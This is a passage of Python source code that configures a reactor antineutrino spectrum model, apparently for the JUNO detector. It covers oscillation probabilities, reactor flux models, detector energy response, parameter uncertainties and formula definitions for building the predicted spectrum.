print('Energy resolution at 1 MeV: {}% ({} pe)'.format(self.opts.eres_sigma*100, self.opts.eres_npe))
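        # e.g. the default 1350 pe gives 1350**-0.5 ≈ 0.0272, i.e. roughly 2.7% resolution at 1 MeV.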
self.cfg = NestedDict(
kinint2 = NestedDict(
bundle = dict(name='integral_2d1d', version='v03', names=dict(integral='kinint2')),
variables = ('evis', 'ctheta'),
edges = np.arange(0.0, 12.001, 0.01), #FIXME
# edges = np.linspace(0.0, 12.001, 601),
xorders = 4,
yorder = 5,
),
rebin = NestedDict(
bundle = dict(name='rebin', version='v03', major=''),
rounding = 3,
edges = np.concatenate( (
[0.7],
np.arange(1, 6.0, self.opts.estep),
np.arange(6, 7.0, 0.1),
[7.0, 7.5, 12.0]
)
),
name = 'rebin',
label = 'Final histogram {detector}'
),
ibd_xsec = NestedDict(
bundle = dict(name='xsec_ibd', version='v02'),
order = 1,
),
oscprob = NestedDict(
bundle = dict(name='oscprob', version='v04', major='rdc', inactive=self.opts.oscprob=='matter'),
pdgyear = self.opts.pdgyear,
dm = self.opts.dm
),
oscprob_matter = NestedDict(
bundle = dict(name='oscprob_matter', version='v01', major='rd', inactive=self.opts.oscprob=='vacuum',
names=dict(oscprob='oscprob_matter')),
density = 2.6, # g/cm3
pdgyear = self.opts.pdgyear,
dm = self.opts.dm
),
anuspec_hm = NestedDict(
bundle = dict(name='reactor_anu_spectra', version='v03', inactive=self.opts.flux!='huber-mueller'),
name = 'anuspec',
filename = ['data/reactor_anu_spectra/Huber/Huber_smooth_extrap_{isotope}_13MeV0.01MeVbin.dat',
'data/reactor_anu_spectra/Mueller/Mueller_smooth_extrap_{isotope}_13MeV0.01MeVbin.dat'],
# strategy = dict( underflow='constant', overflow='extrapolate' ),
edges = np.concatenate( ( np.arange( 1.8, 8.7, 0.025 ), [ 12.3 ] ) ),
),
anuspec_ill = NestedDict(
bundle = dict(name='reactor_anu_spectra', version='v03', inactive=self.opts.flux!='ill-vogel'),
name = 'anuspec',
filename = ['data/reactor_anu_spectra/ILL/ILL_smooth_extrap_{isotope}_13MeV0.01MeVbin.dat',
'data/reactor_anu_spectra/Vogel/Vogel_smooth_extrap_{isotope}_13MeV0.01MeVbin.dat'],
# strategy = dict( underflow='constant', overflow='extrapolate' ),
edges = np.concatenate( ( np.arange( 1.8, 8.7, 0.025 ), [ 12.3 ] ) ),
),
offeq_correction = NestedDict(
bundle = dict(name='reactor_offeq_spectra',
version='v03', major='ir'),
offeq_data = 'data/reactor_anu_spectra/Mueller/offeq/mueller_offequilibrium_corr_{isotope}.dat',
),
eff = NestedDict(
bundle = dict(
name='parameters',
version='v01'),
parameter="eff",
label='Detection efficiency',
pars = uncertain(0.8, 'fixed')
),
global_norm = NestedDict(
bundle = dict(
name='parameters',
version='v01'),
parameter="global_norm",
label='Global normalization',
pars = uncertain(1, 'free'),
),
fission_fractions = NestedDict(
bundle = dict(name="parameters_yaml_v01", major = 'i'),
parameter = "fission_fractions",
label = 'Fission fraction of {isotope} in reactor {reactor}',
objectize=True,
data = 'data/data_juno/fission_fractions/2013.12.05_xubo.yaml'
),
livetime = NestedDict(
bundle = dict(name="parameters", version = "v01"),
parameter = "livetime",
label = 'Livetime of {detector} in seconds',
pars = uncertaindict(
[('AD1', (6*365*seconds_per_day, 'fixed'))],
),
),
baselines = NestedDict(
bundle = dict(name='reactor_baselines', version='v01', major = 'rd'),
reactors = 'near-equal' in self.opts.reactors \
and 'data/juno_nominal/coordinates_reactors_equal.py' \
or 'data/juno_nominal/coordinates_reactors.py',
detectors = 'data/juno_nominal/coordinates_det.py',
unit = 'km'
),
norm = NestedDict(
bundle = dict(name="parameters", version = "v01"),
parameter = "norm",
label = 'Reactor power/detection efficiency correlated normalization',
pars = uncertain(1.0, (2**2+1**2)**0.5, 'percent')
),
thermal_power = NestedDict(
bundle = dict(name="parameters", version = "v01"),
parameter = "thermal_power",
label = 'Thermal power of {reactor} in GWt',
pars = uncertaindict([
('TS1', 4.6),
('TS2', 4.6),
('TS3', 4.6),
('TS4', 4.6),
('YJ1', 2.9),
('YJ2', 2.9),
('YJ3', 2.9),
('YJ4', 2.9),
('YJ5', 2.9),
('YJ6', 2.9),
('DYB', 17.4),
('HZ', 17.4),
],
uncertainty=0.8,
mode='percent'
),
),
target_protons = NestedDict(
bundle = dict(name="parameters", version = "v01"),
parameter = "target_protons",
label = 'Number of protons in {detector}',
pars = uncertaindict(
[('AD1', (1.42e33, 'fixed'))],
),
),
conversion_factor = NestedDict(
bundle = dict(name="parameters", version = "v01"),
parameter='conversion_factor',
label='Conversion factor from GWt to MeV',
#taken from transformations/neutrino/ReactorNorm.cc
pars = uncertain(R.NeutrinoUnits.reactorPowerConversion, 'fixed'),
),
eper_fission = NestedDict(
bundle = dict(name="parameters", version = "v01"),
parameter = "eper_fission",
label = 'Energy per fission for {isotope} in MeV',
pars = uncertaindict(
[
('U235', (201.92, 0.46)),
('U238', (205.52, 0.96)),
('Pu239', (209.99, 0.60)),
('Pu241', (213.60, 0.65))
],
mode='absolute'
),
),
lsnl = NestedDict(
bundle = dict( name='energy_nonlinearity_birks_cherenkov', version='v01', major=''),
stopping_power='data/data_juno/energy_model/2019_birks_cherenkov_v01/stoppingpower.txt',
annihilation_electrons=dict(
file='data/data_juno/energy_model/2019_birks_cherenkov_v01/hgamma2e.root',
histogram='hgamma2e_1KeV',
scale=1.0/50000 # events simulated
),
pars = uncertaindict(
[
('birks.Kb0', (1.0, 'fixed')),
('birks.Kb1', (15.2e-3, 0.1776)),
# ('birks.Kb2', (0.0, 'fixed')),
("cherenkov.E_0", (0.165, 'fixed')),
("cherenkov.p0", ( -7.26624e+00, 'fixed')),
("cherenkov.p1", ( 1.72463e+01, 'fixed')),
("cherenkov.p2", ( -2.18044e+01, 'fixed')),
("cherenkov.p3", ( 1.44731e+01, 'fixed')),
("cherenkov.p4", ( 3.22121e-02, 'fixed')),
("Npescint", (1341.38, 0.0059)),
("kC", (0.5, 0.4737)),
("normalizationEnergy", (11.99, 'fixed'))
],
mode='relative'
),
integration_order = 2,
correlations_pars = [ 'birks.Kb1', 'Npescint', 'kC' ],
correlations = [ 1.0, 0.94, -0.97,
0.94, 1.0, -0.985,
-0.97, -0.985, 1.0 ],
fill_matrix=True,
labels = dict(
normalizationEnergy = 'Conservative normalization point at 12 MeV'
),
),
shape_uncertainty = NestedDict(
unc = uncertain(1.0, 1.0, 'percent'),
nbins = 200 # number of bins the uncertainty is defined for; it is rescaled to the actual binning in preinit_variables
)
)
if 'eres' in self.opts.energy_model:
bconf = self.opts.eres_b_relsigma and (self.opts.eres_b_relsigma, 'relative') or ('fixed',)
self.cfg.eres = NestedDict(
bundle = dict(name='detector_eres_normal', version='v01', major=''),
# pars: sigma_e/e = sqrt( a^2 + b^2/E + c^2/E^2 ),
parameter = 'eres',
pars = uncertaindict([
('a', (0.000, 'fixed')),
('b', (self.opts.eres_sigma,)+bconf),
('c', (0.000, 'fixed'))
]),
expose_matrix = False
)
elif 'multieres' in self.opts.energy_model:
if self.opts.subdetectors_number==200:
self.cfg.subdetector_fraction = NestedDict(
bundle = dict(name="parameters", version = "v02"),
parameter = "subdetector_fraction",
label = 'Subdetector fraction weight for {subdetector}',
pars = uncertaindict(
[(subdet_name, (1.0/self.opts.subdetectors_number, 0.04, 'relative')) for subdet_name in self.subdetectors_names],
),
correlations = 'data/data_juno/energy_resolution/2019_subdetector_eres_n200_proper/corrmap_xuyu.txt'
)
self.cfg.multieres = NestedDict(
bundle = dict(name='detector_multieres_stats', version='v01', major='s'),
# pars: sigma_e/e = sqrt(b^2/E),
parameter = 'eres',
relsigma = self.opts.eres_b_relsigma,
nph = 'data/data_juno/energy_resolution/2019_subdetector_eres_n200_proper/subdetector200_nph.txt',
rescale_nph = self.opts.eres_npe,
expose_matrix = False
)
elif self.opts.subdetectors_number==5:
self.cfg.subdetector_fraction = NestedDict(
bundle = dict(name="parameters", version = "v03"),
parameter = "subdetector_fraction",
label = 'Subdetector fraction weight for {subdetector}',
pars = uncertaindict(
[(subdet_name, (1.0/self.opts.subdetectors_number, 0.04, 'relative')) for subdet_name in self.subdetectors_names],
),
covariance = 'data/data_juno/energy_resolution/2019_subdetector_eres_n200_proper/subdetector5_cov.txt'
)
self.cfg.multieres = NestedDict(
bundle = dict(name='detector_multieres_stats', version='v01', major='s'),
# pars: sigma_e/e = sqrt(b^2/E),
parameter = 'eres',
relsigma = self.opts.eres_b_relsigma,
nph = 'data/data_juno/energy_resolution/2019_subdetector_eres_n200_proper/subdetector5_nph.txt',
rescale_nph = self.opts.eres_npe,
expose_matrix = False
)
else:
assert False
if not 'lsnl' in self.opts.correlation:
self.cfg.lsnl.correlations = None
self.cfg.lsnl.correlations_pars = None
if not 'subdetectors' in self.opts.correlation:
self.cfg.subdetector_fraction.correlations = None
self.cfg.eff.pars = uncertain(0.73, 'fixed')
self.cfg.livetime.pars['AD1'] = uncertain( 6*330*seconds_per_day, 'fixed' )
def preinit_variables(self):
if self.opts.spectrum_unc in ['final', 'initial']:
spec = self.namespace('spectrum')
cfg = self.cfg.shape_uncertainty
unc = cfg.unc
if self.opts.spectrum_unc=='initial':
edges = self.cfg.kinint2.edges
elif self.opts.spectrum_unc=='final':
edges = self.cfg.rebin.edges
# bin-to-bin should take into account the number of bins it is applied to
unccorrection = ((edges.size-1.0)/cfg.nbins)**0.5
unc.uncertainty*=unccorrection
names = []
for bini in range(edges.size-1):
name = 'norm_bin_%04i'%bini
names.append(name)
label = 'Spectrum shape unc. final bin %i (%.03f, %.03f) MeV'%(bini, edges[bini], edges[bini+1])
spec.reqparameter(name, cfg=unc, label=label)
with spec:
vararray = C.VarArray(names, labels='Spectrum shape norm')
self.cfg.shape_uncertainty = NestedDict(
bundle = dict(name='predefined', version='v01'),
name = 'shape_norm',
inputs = None,
outputs = vararray.single(),
unc = cfg.unc,
object = vararray
)
elif self.opts.spectrum_unc=='none':
pass
else:
raise Exception('Unknown spectrum shape uncertainty type: '+self.opts.spectrum_unc)
def build(self):
from gna.expression.expression_v01 import Expression_v01, ExpressionContext_v01
from gna.bundle import execute_bundles
# Initialize the expression and indices
self.expression = Expression_v01(self.formula, self.nidx)
# Dump the information
if self.opts.verbose:
print(self.expression.expressions_raw)
print(self.expression.expressions)
# Parse the expression
self.expression.parse()
# The next step is needed to name all the intermediate variables.
self.expression.guessname(self.lib, save=True)
if self.opts.verbose>1:
print('Expression tree:')
self.expression.tree.dump(True)
print()
# Put the expression into context
self.context = ExpressionContext_v01(self.cfg, ns=self.namespace)
self.expression.build(self.context)
def autodump(self):
if self.opts.verbose>2:
width = 40
print('Outputs:')
print(self.context.outputs.__str__(nested=True, width=width))
print()
print('Inputs:')
print(self.context.inputs.__str__(nested=True, width=width))
print()
if self.opts.verbose or self.opts.stats:
print('Parameters:')
self.stats = dict()
correlations = self.opts.verbose>2 and 'full' or 'short'
self.namespace.printparameters(labels=True, stats=self.stats, correlations=correlations)
def register(self):
ns = self.namespace
outputs = self.context.outputs
# ns.addobservable("{0}_unoscillated".format(self.detectorname), outputs, export=False)
ns.addobservable("Enu", outputs.enu, export=False)
if 'ibd_noeffects_bf' in outputs:
ns.addobservable("{0}_noeffects".format(self.detectorname), outputs.ibd_noeffects_bf.AD1)
fine = outputs.ibd_noeffects_bf.AD1
else:
ns.addobservable("{0}_noeffects".format(self.detectorname), outputs.kinint2.AD1)
fine = outputs.kinint2.AD1
if 'lsnl' in self.opts.energy_model:
ns.addobservable("{0}_lsnl".format(self.detectorname), outputs.lsnl.AD1)
fine = outputs.lsnl.AD1
if 'eres' in self.opts.energy_model:
ns.addobservable("{0}_eres".format(self.detectorname), outputs.eres.AD1)
fine = outputs.eres.AD1
if 'multieres' in self.opts.energy_model:
if self.opts.multieres=='concat' and self.opts.subdetectors_number<10:
sns = ns('{}_sub'.format(self.detectorname))
for i, out in enumerate(outputs.rebin.AD1.values()):
sns.addobservable("sub{:02d}".format(i), out)
ns.addobservable("{0}_eres".format(self.detectorname), outputs.ibd.AD1)
fine = outputs.ibd.AD1
ns.addobservable("{0}_fine".format(self.detectorname), fine)
ns.addobservable("{0}".format(self.detectorname), outputs.observation.AD1)
def print_stats(self):
from gna.graph import GraphWalker, report, taint, taint_dummy
out=self.context.outputs.rebin.AD1
walker = GraphWalker(out)
report(out.data, fmt='Initial execution time: {total} s')
report(out.data, 100, pre=lambda: walker.entry_do(taint), pre_dummy=lambda: walker.entry_do(taint_dummy))
print('Statistics', walker.get_stats())
print('Parameter statistics', self.stats)
formula_enu = ['evis_hist=evis_hist()', 'enu| ee(evis()), ctheta()']
formula_base = [
'baseline[d,r]',
'livetime[d]',
'conversion_factor',
'numerator = eff * livetime[d] * thermal_power[r] * '
'fission_fractions[r,i]() * conversion_factor * target_protons[d] ',
'eper_fission_avg = sum[i] | eper_fission[i] * fission_fractions[r,i]()',
'power_livetime_factor = numerator / eper_fission_avg',
]
formula_ibd_noeffects = '''
kinint2(
sum[r]|
baselineweight[r,d]*
ibd_xsec(enu(), ctheta())*
jacobian(enu(), ee(), ctheta())*
expand(sum[i]|
power_livetime_factor*anuspec[i](enu()){offeq_correction})*
{oscprob}
)
'''
formula_oscprob_vacuum = 'sum[c]| pmns[c]*oscprob[c,d,r](enu())'
formula_oscprob_matter = 'oscprob_matter[d,r](enu())'
lib = """
cspec_diff:
expr: 'anuspec*ibd_xsec*jacobian*oscprob'
label: 'anu count rate | {isotope}@{reactor}-\\>{detector} ({component})'
cspec_diff_reac_l:
expr: 'baselineweight*cspec_diff_reac'
cspec_diff_det_weighted:
expr: 'pmns*cspec_diff_det'
eres_weighted:
expr: 'subdetector_fraction*eres'
label: '{{Fractional observed spectrum {subdetector}|weight: {weight_label}}}'
ibd:
expr:
- 'eres'
- 'sum:c|eres_weighted'
label: 'Observed IBD spectrum | {detector}'
ibd_noeffects:
expr: 'kinint2'
label: 'Observed IBD spectrum (no effects) | {detector}'
ibd_noeffects_bf:
expr: 'kinint2*shape_norm'
label: 'Observed IBD spectrum (best fit, no effects) | {detector}'
oscprob_weighted:
expr: 'oscprob*pmns'
oscprob_full:
expr: 'sum:c|oscprob_weighted'
label: 'anue survival probability | weight: {weight_label}'
fission_fractions:
expr: 'fission_fractions[r,i]()'
label: "Fission fraction for {isotope} at {reactor}"
eper_fission_weight:
expr: 'eper_fission_weight'
label: "Weighted eper_fission for {isotope} at {reactor}"
eper_fission_weighted:
expr: 'eper_fission*fission_fractions'
label: "{{Energy per fission for {isotope} | weighted with fission fraction at {reactor}}}"
eper_fission_avg:
expr: 'eper_fission_avg'
label: 'Average energy per fission at {reactor}'
power_livetime_factor:
expr: 'power_livetime_factor'
label: '{{Power-livetime factor (~nu/s)|{reactor}.{isotope}-\\>{detector}}}'
numerator:
expr: 'numerator'
label: '{{Power-livetime factor (~MW)|{reactor}.{isotope}-\\>{detector}}}'
power_livetime_scale:
expr: 'eff*livetime*thermal_power*conversion_factor*target_protons'
label: '{{Power-livetime factor (~MW)| {reactor}.{isotope}-\\>{detector}}}'
anuspec_weighted:
expr: 'anuspec*power_livetime_factor'
label: '{{Antineutrino spectrum|{reactor}.{isotope}-\\>{detector}}}'
anuspec_rd:
expr: 'sum:i|anuspec_weighted'
label: '{{Antineutrino spectrum|{reactor}-\\>{detector}}}'
countrate_rd:
expr:
- 'anuspec_rd*ibd_xsec*jacobian*oscprob_full'
- 'anuspec_rd*ibd_xsec*oscprob_full'
label: 'Countrate {reactor}-\\>{detector}'
countrate_weighted:
expr: 'baselineweight*countrate_rd'
countrate:
expr: 'sum:r|countrate_weighted'
label: '{{Count rate at {detector}|weight: {weight_label}}}'
observation_raw:
expr: 'bkg+ibd'
label: 'Observed spectrum | {detector}'
iso_spectrum_w:
expr: 'kinint2*power_livetime_factor'
reac_spectrum:
expr: 'sum:i|iso_spectrum_w'
reac_spectrum_w:
expr: 'baselineweight*reac_spectrum'
ad_spectrum_c:
expr: 'sum:r|reac_spectrum_w'
ad_spectrum_cw:
expr: 'pmns*ad_spectrum_c'
ad_spectrum_w:
expr: 'sum:c|ad_spectrum_cw'
eres_cw:
expr: 'eres*pmns'
"""
|